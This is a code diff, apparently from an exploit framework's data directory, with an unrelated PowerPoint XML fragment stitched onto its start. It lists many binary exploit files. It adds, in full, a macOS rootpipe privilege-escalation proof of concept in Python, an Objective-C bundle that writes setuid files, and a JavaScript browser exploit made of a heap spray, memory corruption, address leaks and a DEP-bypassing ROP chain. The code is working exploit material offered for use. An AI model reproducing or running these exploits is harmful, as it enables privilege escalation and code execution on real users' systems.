+<p:viewPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:normalViewPr><p:restoredLeft sz="15620"/><p:restoredTop sz="94660"/></p:normalViewPr><p:slideViewPr><p:cSldViewPr><p:cViewPr varScale="1"><p:scale><a:sx n="57" d="100"/><a:sy n="57" d="100"/></p:scale><p:origin x="-1242" y="-522"/></p:cViewPr><p:guideLst><p:guide orient="horz" pos="2160"/><p:guide pos="2880"/></p:guideLst></p:cSldViewPr></p:slideViewPr><p:notesTextViewPr><p:cViewPr><p:scale><a:sx n="100" d="100"/><a:sy n="100" d="100"/></p:scale><p:origin x="0" y="0"/></p:cViewPr></p:notesTextViewPr><p:gridSpacing cx="76200" cy="76200"/></p:viewPr>
--- a/data/exploits/CVE-2014-8440/msf.swf
+++ b/data/exploits/CVE-2014-8440/msf.swf
--- a/data/exploits/CVE-2015-0016/cve-2015-0016.dll
+++ b/data/exploits/CVE-2015-0016/cve-2015-0016.dll
--- a/data/exploits/CVE-2015-0311/msf.swf
+++ b/data/exploits/CVE-2015-0311/msf.swf
--- a/data/exploits/CVE-2015-0313/msf.swf
+++ b/data/exploits/CVE-2015-0313/msf.swf
--- a/data/exploits/CVE-2015-0318/Main.swf
+++ b/data/exploits/CVE-2015-0318/Main.swf
--- a/data/exploits/CVE-2015-0336/msf.swf
+++ b/data/exploits/CVE-2015-0336/msf.swf
--- a/data/exploits/CVE-2015-0336/trigger.swf
+++ b/data/exploits/CVE-2015-0336/trigger.swf
--- a/data/exploits/CVE-2015-0336/trigger_linux.swf
+++ b/data/exploits/CVE-2015-0336/trigger_linux.swf
--- a/data/exploits/CVE-2015-0359/msf.swf
+++ b/data/exploits/CVE-2015-0359/msf.swf
--- a/data/exploits/CVE-2015-1130/exploit.py
+++ b/data/exploits/CVE-2015-1130/exploit.py
@ -0,0 +1,73 @@
+########################################################
+#
+#  PoC exploit code for rootpipe (CVE-2015-1130)
+#
+#  Created by Emil Kvarnhammar, TrueSec
+#
+#  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
+#
+########################################################
+import os
+import sys
+import platform
+import re
+import ctypes
+import objc
+import sys
+from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
+from Foundation import NSAutoreleasePool
+
+def load_lib(append_path):
+    return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);
+
+def use_old_api():
+    return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])
+
+
+args = sys.argv
+
+if len(args) != 3:
+    print "usage: exploit.py source_binary dest_binary_as_root"
+    sys.exit(-1)
+
+source_binary = args[1]
+dest_binary = os.path.realpath(args[2])
+
+if not os.path.exists(source_binary):
+    raise Exception("file does not exist!")
+
+pool = NSAutoreleasePool.alloc().init()
+
+attr = NSMutableDictionary.alloc().init()
+attr.setValue_forKey_(04777, NSFilePosixPermissions)
+data = NSData.alloc().initWithContentsOfFile_(source_binary)
+
+print "will write file", dest_binary
+
+if use_old_api():
+    adm_lib = load_lib("/Admin.framework/Admin")
+    Authenticator = objc.lookUpClass("Authenticator")
+    ToolLiaison = objc.lookUpClass("ToolLiaison")
+    SFAuthorization = objc.lookUpClass("SFAuthorization")
+
+    authent = Authenticator.sharedAuthenticator()
+    authref = SFAuthorization.authorization()
+
+    # authref with value nil is not accepted on OS X <= 10.8
+    authent.authenticateUsingAuthorizationSync_(authref)
+    st = ToolLiaison.sharedToolLiaison()
+    tool = st.tool()
+    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
+else:
+    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
+    WriteConfigClient = objc.lookUpClass("WriteConfigClient")
+    client = WriteConfigClient.sharedClient()
+    client.authenticateUsingAuthorizationSync_(None)
+    tool = client.remoteProxy()
+
+    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)
+
+
+print "Done!"
+
+del pool
--- a/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
+++ b/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
--- a/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
+++ b/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
--- a/data/exploits/CVE-2015-2426/reflective_dll.x64.dll
+++ b/data/exploits/CVE-2015-2426/reflective_dll.x64.dll
--- a/data/exploits/CVE-2015-3090/msf.swf
+++ b/data/exploits/CVE-2015-3090/msf.swf
--- a/data/exploits/CVE-2015-3105/msf.swf
+++ b/data/exploits/CVE-2015-3105/msf.swf
--- a/data/exploits/CVE-2015-3113/msf.swf
+++ b/data/exploits/CVE-2015-3113/msf.swf
--- a/data/exploits/CVE-2015-3673/exploit.daplug
+++ b/data/exploits/CVE-2015-3673/exploit.daplug
--- a/data/exploits/CVE-2015-3673/exploit.m
+++ b/data/exploits/CVE-2015-3673/exploit.m
@ -0,0 +1,33 @@
+// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
+
+#include <dlfcn.h>
+#include <objc/objc.h>
+#include <objc/runtime.h>
+#include <objc/message.h>
+#include <Foundation/Foundation.h>
+
+#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
+#define FWK_BASE "/System/Library/Frameworks"
+
+void __attribute__ ((constructor)) test(void)
+{
+    void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
+
+    if (p != NULL)
+    {
+        id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
+        objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
+        id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
+
+        NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
+        NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
+        NSData* data = [NSData dataWithContentsOfFile:inpath];
+
+        objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
+                     data,
+                     outpath,
+                     @{ NSFilePosixPermissions : @04777 });
+    }
+
+    exit(1);
+}
--- a/data/exploits/CVE-2015-5119/msf.swf
+++ b/data/exploits/CVE-2015-5119/msf.swf
--- a/data/exploits/CVE-2015-5122/msf.swf
+++ b/data/exploits/CVE-2015-5122/msf.swf
--- a/data/exploits/capture/http/forms/extractforms.rb
+++ b/data/exploits/capture/http/forms/extractforms.rb
@ -11,7 +11,6 @@

 require 'rubygems'  # install rubygems
 require 'hpricot'   # gem install hpricot
-require 'open-uri'
 require 'timeout'

 def usage
--- a/data/exploits/capture/http/forms/grabforms.rb
+++ b/data/exploits/capture/http/forms/grabforms.rb
@ -11,7 +11,7 @@

 require 'rubygems'  # install rubygems
 require 'hpricot'   # gem install hpricot
-require 'open-uri'
+require 'uri'
 require 'timeout'

 def usage
@ -26,17 +26,17 @@ File.readlines(sitelist).each do |site|
  site.strip!
  next if site.length == 0
  next if site =~ /^#/
-  
+
  out = File.join(output, site + ".txt")
  File.unlink(out) if File.exists?(out)
-  
+
  fd  = File.open(out, "a")
-  
+

  ["", "www."].each do |prefix|
    begin
-      Timeout.timeout(10) do 
-        doc = Hpricot(open("http://#{prefix}#{site}/"))
+      Timeout.timeout(10) do
+        doc = Hpricot(URI.parse("http://#{prefix}#{site}/").open)
        doc.search("//form").each do |form|

          # Extract the form
@ -78,9 +78,9 @@ File.readlines(sitelist).each do |site|
      $stderr.puts "#{prefix}#{site} #{e.class} #{e}"
    end
  end
-  
+
  fd.close
-  
+
  File.unlink(out) if (File.size(out) == 0)

 end
--- a/data/exploits/edb-35948/js/exploit.js
+++ b/data/exploits/edb-35948/js/exploit.js
@ -0,0 +1,126 @@
+var Exploit = function () {
+    // create its vulnerable ActiveX object (as HTMLObjectElement)
+    this.obj = document.createElement("object");
+    this.obj.setAttribute("classid", "clsid:4B3476C6-185A-4D19-BB09-718B565FA67B");
+    // perform controlled memwrite to 0x1111f010: typed array header is at
+    // 0x1111f000 to 0x1111f030 => overwrite array data header @ 11111f010 with
+    // 0x00000001 0x00000004 0x00000040 0x1111f030 0x00
+    // The first 3 dwords are sideeffects due to the code we abuse for the
+    // controlled memcpy
+    this.whereAddress = 0x1111f010;
+    this.memory = null;
+    this.addresses = new Object();
+    this.sprayer = null;
+    this.informer = null;
+    this.sc = "<%=shellcode%>";
+};
+
+Exploit.prototype.run = function() {
+    CollectGarbage();
+    this.sprayer = new Sprayer();
+    this.sprayer.spray();
+
+    this.memory = this.doCorruption();
+
+    //alert(this.memory.length.toString(16))
+    if (this.memory.length != 0x7fffffff){
+        //alert("Cannot change Uint32Array length");
+        return -1;
+    }
+
+    // now we could even repair the change we did with memcpy ...
+
+    this.informer = new Informer(this.sprayer.corruptedArrayNext, this.memory, this.whereAddress);
+    var leakSuccess = this.leakAddresses();
+
+    if (leakSuccess != 0) {
+        //alert("Cannot leak required address to build the ROP chain");
+        return leakSuccess;
+    }
+
+    var ropBuilder = new RopBuilder(this.informer, this.addresses, this.sc.length);
+    ropBuilder.buildRop();
+
+    // manipulate object data to gain EIP control with "Play" method
+    var videopObj = this.memory[this.addresses['objAddress'] / 4 + 26];
+    this.memory[(videopObj - 0x10) / 4] = ropBuilder.ropAddress; // rop address will be used in EAX in below call
+
+    // eip control @ VideoPlayer.ocx + 0x6643B: CALL DWORD PTR [EAX+0x30] */
+    this.obj.Play()
+};
+
+Exploit.prototype.prepareOverflow = function() {
+    // prepare buffer with address we want to write to
+    var ptrBuf = "";
+    // fill buffer: length = relative pointer address - buffer start + pointer
+    // offset
+    while (ptrBuf.length < (0x92068 - 0x916a8 + 0xC)) { ptrBuf += "A" }
+    ptrBuf += this.dword2str(this.whereAddress);
+
+    return ptrBuf;
+};
+
+Exploit.prototype.doCorruption = function() {
+    var ptrBuf = this.prepareOverflow();
+
+    // trigger: overflow buffer and overwrite the pointer value after buffer
+    this.obj.SetText(ptrBuf, 0, 0);
+    //alert("buffer overflown => check PTR @ videop_1+92068: dc videop_1+92068")
+
+    // use overwritten pointer after buffer with method "SetFontName" to conduct
+    // memory write.  We overwrite a typed array's header length to 0x40 and let
+    // its buffer point to the next typed array header at 0x1111f030 (see above)
+    this.obj.SetFontName(this.dword2str(this.whereAddress + 0x20)); // WHAT TO WRITE
+
+
+    if (this.sprayer.find() == -1){
+        //alert("cannot find corrupted Uint32Array");
+        return -1
+    }
+
+    // modify subsequent Uint32Array to be able to RW all process memory
+    this.sprayer.corruptedArray[6] = 0x7fffffff; // next Uint32Array length
+    this.sprayer.corruptedArray[7] = 0; // set buffer of next Uint32Array to start of process mem
+
+    // our memory READWRITE interface :)
+    return this.sprayer.fullMemory;
+};
+
+Exploit.prototype.leakAddresses = function() {
+    this.addresses['objAddress'] = this.informer.leakVideoPlayerAddress(this.obj);
+
+    this.addresses['base'] = this.informer.leakVideoPlayerBase(this.obj);
+
+    // check if we have the image of VideoPlayer.ocx
+    // check for MZ9000 header and "Vide" string at offset 0x6a000
+    if (this.memory[this.addresses['base'] / 4] != 0x905a4d ||
+        this.memory[(this.addresses['base'] + 0x6a000) / 4] != 0x65646956){
+        //alert("Cannot find VideoPlayer.ocx base or its version is wrong");
+        return -1;
+    }
+    //alert(this.addresses['base'].toString(16))
+
+    // get VirtualAlloc from imports of VideoPlayer.ocx
+    this.addresses['virtualAlloc'] = this.memory[(this.addresses['base'] + 0x69174)/4];
+    // memcpy is available inside VideoPlayer.ocx
+    this.addresses['memcpy'] = this.addresses['base'] + 0x15070;
+    //alert("0x" + this.addresses['virtualAlloc'].toString(16) + " " + "0x" + this.addresses['memcpy'].toString(16))
+
+    scBuf = new Uint8Array(this.sc.length);
+    for (n=0; n < this.sc.length; n++){
+        scBuf[n] = this.sc.charCodeAt(n);
+    }
+
+    this.addresses['shellcode'] = this.informer.leakShellcodeAddress(scBuf);
+
+    return 0;
+};
+
+// dword to little endian string
+Exploit.prototype.dword2str = function(dword) {
+    var str = "";
+    for (var n=0; n < 4; n++){
+        str += String.fromCharCode((dword >> 8 * n) & 0xff);
+    }
+    return str;
+};
--- a/data/exploits/edb-35948/js/informer.js
+++ b/data/exploits/edb-35948/js/informer.js
@ -0,0 +1,52 @@
+var Informer = function(infArray, mem, ref) {
+    this.infoLeakArray = infArray;
+    this.memoryArray =  mem;
+    this.referenceAddress = ref;
+};
+
+// Calculate VideoPlayer.ocx base
+Informer.prototype.leakVideoPlayerBase = function(videoPlayerObj) {
+    this.infoLeakArray[0] = videoPlayerObj; // set HTMLObjectElement as first element
+    //alert(mem[0x11120020/4].toString(16))
+    var arrayElemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4]; // leak array elem. @ 0x11120020 (obj)
+    var objPtr = this.memoryArray[arrayElemPtr/4 + 6]; // deref array elem. + 0x18
+    var heapPtrVideoplayer = this.memoryArray[objPtr/4 + 25]; // deref HTMLObjectElement + 0x64
+    // deref heap pointer containing VideoPlayer.ocx pointer
+    var videoplayerPtr = this.memoryArray[heapPtrVideoplayer/4];
+    var base = videoplayerPtr - 0x6b3b0; // calculate base
+
+    return base;
+};
+
+// Calculate VideoPlayer object addres
+Informer.prototype.leakVideoPlayerAddress = function(videoPlayerObj) {
+    this.infoLeakArray[0] = videoPlayerObj; // set HTMLObjectElement as first element
+    //alert(mem[0x11120020/4].toString(16))
+    var arrayElemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4]; // leak array elem. @ 0x11120020 (obj)
+    var objPtr = this.memoryArray[arrayElemPtr/4 + 6]; // deref array elem. + 0x18
+
+    return objPtr;
+};
+
+// Calculate the shellcode address
+Informer.prototype.leakShellcodeAddress = function(shellcodeBuffer) {
+    this.infoLeakArray[0] = shellcodeBuffer;
+    // therefore, leak array element at 0x11120020 (typed array header of
+    // Uint8Array containing shellcode) ...
+    var elemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4];
+    // ...and deref array element + 0x1c (=> leak shellcode's buffer address)
+    var shellcodeAddr = this.memoryArray[(elemPtr/4) + 7]
+
+    return shellcodeAddr;
+};
+
+
+Informer.prototype.leakRopAddress = function(ropArray) {
+    this.infoLeakArray[0] = ropArray
+    // leak array element at 0x11120020 (typed array header)
+    var elemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4];
+    // deref array element + 0x1c (leak rop's buffer address)
+    var ropAddr = this.memoryArray[(elemPtr/4) + 7]  // payload address
+
+    return ropAddr;
+};
--- a/data/exploits/edb-35948/js/rop_builder.js
+++ b/data/exploits/edb-35948/js/rop_builder.js
@ -0,0 +1,38 @@
+var RopBuilder = function(informer, addresses, scLength) {
+    this.rop = new Uint32Array(0x1000);
+    this.ropAddress = informer.leakRopAddress(this.rop);
+    this.base = addresses['base'];
+    this.virtualAlloc = addresses['virtualAlloc'];
+    this.memcpy = addresses['memcpy'];
+    this.scAddr = addresses['shellcode'];
+    this.scLength = scLength;
+};
+
+// Build the ROP chain to bypass DEP
+RopBuilder.prototype.buildRop = function() {
+    // ROP chain (rets in comments are omitted)
+    // we perform:
+    // (void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX)
+    // memcpy(EAX, shellcode, shellcodeLen)
+    // (void(*)())EAX()
+    var offs = 0x30/4;                                 // offset to chain after CALL [EAX+0x30]
+    this.rop[0] = this.base + 0x1ff6;                  // ADD ESP, 0x30;
+    this.rop[offs + 0x0] = this.base + 0x1ea1e;        // XCHG EAX, ESP; <-- first gadget called
+    this.rop[offs + 0x1] = this.virtualAlloc;          // allocate RWX mem (address avail. in EAX)
+    this.rop[offs + 0x2] = this.base + 0x10e9;         // POP ECX; => pop the value at offs + 0x7
+    this.rop[offs + 0x3] = 0;                          // lpAddress
+    this.rop[offs + 0x4] = 0x4000;                     // dwSize (0x4000)
+    this.rop[offs + 0x5] = 0x1000;                     // flAllocationType (MEM_COMMIT)
+    this.rop[offs + 0x6] = 0x40;                       // flProtect (PAGE_EXECUTE_READWRITE)
+    this.rop[offs + 0x7] = this.ropAddress + (offs+0xe)*4;  // points to memcpy's dst param (*2)
+    this.rop[offs + 0x8] = this.base + 0x1c743;        // MOV [ECX], EAX; => set dst to RWX mem
+    this.rop[offs + 0x9] = this.base + 0x10e9;         // POP ECX;
+    this.rop[offs + 0xa] = this.ropAddress + (offs+0xd)*4;  // points to (*1) in chain
+    this.rop[offs + 0xb] = this.base + 0x1c743;        // MOV [ECX], EAX; => set return to RWX mem
+    this.rop[offs + 0xc] = this.memcpy;
+    this.rop[offs + 0xd] = 0xffffffff;                 // (*1): ret addr to RWX mem filled at runtime
+    this.rop[offs + 0xe] = 0xffffffff;                 // (*2): dst for memcpy filled at runtime
+    this.rop[offs + 0xf] = this.scAddr;                // shellcode src addr to copy to RWX mem (param2)
+    this.rop[offs + 0x10] = this.scLength;             // length  of shellcode (param3)
+};
+
--- a/data/exploits/edb-35948/js/sprayer.js
+++ b/data/exploits/edb-35948/js/sprayer.js
@ -0,0 +1,58 @@
+var Sprayer = function () {
+    // amount of arrays to create on the heap
+    this.nrArrays = 0x1000;
+    // size of data in one array block: 0xefe0 bytes =>
+    // subract array header (0x20) and space for typed array headers (0x1000)
+    // from 0x10000
+    this.arrSize =  (0x10000-0x20-0x1000)/4;
+    // heap array container will hold our heap sprayed data
+    this.arr = new Array(this.nrArrays);
+    // use one buffer for all typed arrays
+    this.intArrBuf = new ArrayBuffer(4);
+    this.corruptedArray = null;
+    this.corruptedArrayNext = null;
+};
+
+// Spray the heap with array data blocks and subsequent typed array headers
+// of type Uint32Array
+Sprayer.prototype.spray = function() {
+    var k = 0;
+    while(k < this.nrArrays) {
+        // create "jscript9!Js::JavascriptArray" with blocksize 0xf000 (data
+        // aligned at 0xXXXX0020)
+        this.arr[k] = new Array(this.arrSize);
+
+        // fill remaining page (0x1000) after array data with headers of
+        // "jscript9!Js::TypedArray<unsigned int>"  (0x55 * 0x30 = 0xff0) as a
+        // typed array header has the size of 0x30. 0x10 bytes are left empty
+        for(var i = 0; i < 0x55; i++){
+            // headers become aligned @ 0xXXXXf000, 0xXXXXf030, 0xXXXXf060,...
+            this.arr[k][i] = new Uint32Array(this.intArrBuf, 0, 1);
+        }
+
+        // tag the array's last element
+        this.arr[k][this.arrSize - 1] = 0x12121212;
+        k += 1;
+    }
+};
+
+// Find the corrupted Uint32Array (typed array)
+Sprayer.prototype.find = function() {
+    var k = 0;
+
+    while(k < this.nrArrays - 1) {
+        for(var i = 0; i < 0x55-1; i++){
+            if(this.arr[k][i][0] != 0){
+                // address of jscript9!Js::TypedArray<unsigned int>::`vftable'
+                // alert("0x" + arr[k][i][0].toString(16))
+                this.corruptedArray = this.arr[k][i];
+                this.corruptedArrayNext = this.arr[k+1];
+                this.fullMemory = this.arr[k][i+1];
+                return 1;
+            }
+        }
+        k++;
+    }
+
+    return -1;
+};
--- a/Show More
+++ b/Show More